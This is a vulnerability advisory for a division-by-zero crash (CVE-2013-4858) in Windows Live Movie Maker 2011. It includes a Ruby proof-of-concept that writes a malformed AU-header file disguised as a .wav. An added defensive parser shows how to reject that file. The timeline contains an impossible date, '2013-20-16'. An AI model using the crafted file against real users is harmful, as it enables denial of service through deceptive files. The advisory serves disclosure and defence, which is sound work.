1. Advisory Information
Title: Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness
Advisory URL: https://osandamalith.wordpress.com/2014/01/10/microsoft-windows-live-movie-maker-wav-file-handling-dos-weakness/
Date published: 2014-01-10
Vendors contacted: Microsoft
Release mode: User release
2. Vulnerability Information
Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4858
3. Summary
Microsoft Windows Live Movie Maker is Microsoft's consumer video-editing application for Windows 7, distributed as part of Windows Live Essentials. It is intended for simple, small-scale video editing.
4. Vulnerability Description
Microsoft Windows Live Movie Maker crashes when a user imports a malformed audio file, resulting in a loss of availability for the program (the researcher notes that this is a simple crash rather than an exploitable bug). This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share). Note that although the proof-of-concept file below carries a .wav extension, its contents are not a RIFF/WAVE container: the first 24 bytes form a Sun/NeXT AU header (magic ".snd", big-endian data offset 0x118, data size 0x42DC, encoding 1 for 8-bit mu-law, sample rate 8000 Hz) whose channel-count field is zero, which is consistent with the integer-division-by-zero class stated above.
5. Vulnerable Packages
- Version 2011 (Build 15.4.53508.1109)
6. Credits
This bug was researched by Osanda Malith Jayathissa.
7. Proof of Concept
#!/usr/bin/env ruby
#Title: Windows Live Movie Maker 2011 (.wav) DoS Local Exploit
#Version: Version 2011 (Build 15.4.53508.1109)
#Tested on: Windows 7 Professional 32-bit SP1
#E-Mail: OsandaJayathissa@gmail.com
#Exploit-Author: Osanda Malith Jayathissa
#Video: https://www.youtube.com/watch?v=SBJYzSNdY6k
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only
#This is just a simple crash not an exploitable bug
#Twitter: @OsandaMalith
#Date: 25 December 2013
#CVE: 2013-4858
begin
# Payload: a Sun/NeXT AU header (magic ".snd", data offset 0x118, data size 0x42DC,
# encoding 1 = 8-bit mu-law, sample rate 0x1F40 = 8000 Hz, channel count 0),
# followed by an annotation string and filler bytes. The file is saved with a
# .wav extension.
dos =(
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
# Binary mode so that Windows text-mode newline translation cannot alter the bytes.
file = open("WindowsMovieMaker.wav","wb")
file.write(dos)
file.close()
puts "[+] Exploit created >> WindowsMovieMaker.wav"
puts "[*] Open any image and Click add music and add our payload"
puts "[~] by Osanda Malith"
end
#EOF
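The following is an added example, not part of the original advisory and not Movie Maker's own code: a small defensive reader for the 24-byte Sun/NeXT AU header that the proof-of-concept file above actually begins with. It unpacks the fields the way a naive decoder would, shows that computing the frame count from the PoC header hits the integer division by zero the advisory names (channel count 0), and contrasts that with a hardened parse that rejects the header before any arithmetic runs. The header layout follows the public AU format; the function names, the rejection policy and the test input are this example's own assumptions.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original advisory): defensive parsing of the
# Sun/NeXT AU header carried by the PoC file, with the checks a decoder needs
# before dividing by the channel count. Helper names and policy are assumed.

AU_MAGIC = ".snd".b
AU_HEADER_SIZE = 24

# Bytes per sample for the common AU encoding codes:
# 1 = 8-bit G.711 mu-law, 2/3/4/5 = 8/16/24/32-bit linear PCM,
# 6 = 32-bit float, 7 = 64-bit float.
BYTES_PER_SAMPLE = { 1 => 1, 2 => 1, 3 => 2, 4 => 3, 5 => 4, 6 => 4, 7 => 8 }.freeze

class MalformedAudio < StandardError; end

# First 24 bytes of the advisory's PoC file, constructed here from its hex dump:
# magic ".snd", offset 0x118, size 0x42DC, encoding 1, rate 8000 Hz, channels 0.
POC_HEADER = ["2e736e64" "00000118" "000042dc" "00000001" "00001f40" "00000000"].pack("H*")

# Unpack the header fields with no value validation: what a naive decoder sees.
def read_au_fields(bytes)
  raise MalformedAudio, "file shorter than the AU header" if bytes.bytesize < AU_HEADER_SIZE
  magic = bytes.byteslice(0, 4)
  raise MalformedAudio, "magic #{magic.inspect} is not .snd" unless magic == AU_MAGIC
  offset, size, encoding, rate, channels = bytes.byteslice(4, 20).unpack("N5")
  { data_offset: offset, data_size: size, encoding: encoding,
    sample_rate: rate, channels: channels }
end

# Frame count as a decoder computes it: data_size / (channels * bytes per sample).
# With channels == 0 this is exactly the integer division by zero in the advisory.
def frame_count(fields)
  fields[:data_size] / (fields[:channels] * BYTES_PER_SAMPLE.fetch(fields[:encoding]))
end

# Hardened entry point: reject every field value that would make the
# arithmetic undefined or point outside the file before any of it runs.
def parse_au_header(bytes)
  f = read_au_fields(bytes)
  raise MalformedAudio, "unsupported encoding #{f[:encoding]}" unless BYTES_PER_SAMPLE.key?(f[:encoding])
  raise MalformedAudio, "channel count is zero" if f[:channels].zero?
  raise MalformedAudio, "sample rate is zero" if f[:sample_rate].zero?
  raise MalformedAudio, "data offset #{f[:data_offset]} lies inside the header" if f[:data_offset] < AU_HEADER_SIZE
  raise MalformedAudio, "data offset beyond end of file" if f[:data_offset] > bytes.bytesize
  if f[:data_size] != 0xFFFFFFFF && f[:data_size] > bytes.bytesize - f[:data_offset]
    raise MalformedAudio, "declared data size exceeds file"
  end
  f.merge(frames: frame_count(f))
end

# True only for a genuine RIFF/WAVE container; the PoC's .wav extension is a lie.
def riff_wave?(bytes)
  bytes.bytesize >= 12 && bytes.byteslice(0, 4) == "RIFF".b && bytes.byteslice(8, 4) == "WAVE".b
end

# Build a well-formed AU header (used to construct comparison input).
def au_header(data_offset:, data_size:, encoding:, sample_rate:, channels:)
  AU_MAGIC + [data_offset, data_size, encoding, sample_rate, channels].pack("N5")
end

if __FILE__ == $PROGRAM_NAME
  bytes = ARGV[0] ? File.binread(ARGV[0]) : POC_HEADER
  puts "RIFF/WAVE container: #{riff_wave?(bytes)}"
  puts "raw fields: #{read_au_fields(bytes).inspect}"
  begin
    puts "accepted: #{parse_au_header(bytes).inspect}"
  rescue MalformedAudio => e
    puts "rejected: #{e.message}"
  end
end
```

Run it with the PoC file as its argument (or with no argument to use the embedded header) and it reports that the file is not a RIFF/WAVE container and rejects it for a zero channel count; the point of the ordering in parse_au_header is that the divisor is validated before frame_count is ever called, and that the format is decided by the magic bytes rather than the file extension.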
8. Report Timeline
2013-10-16: The researcher notifies the vendor Microsoft.
2013-20-16: The vendor confirms that it is only a crash and not an exploitable bug.
2014-01-10: Public disclosure.
9. Disclaimer
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
10. References
[1] http://packetstormsecurity.com/files/124596/Windows-Live-Movie-Maker-2011-Denial-Of-Service.html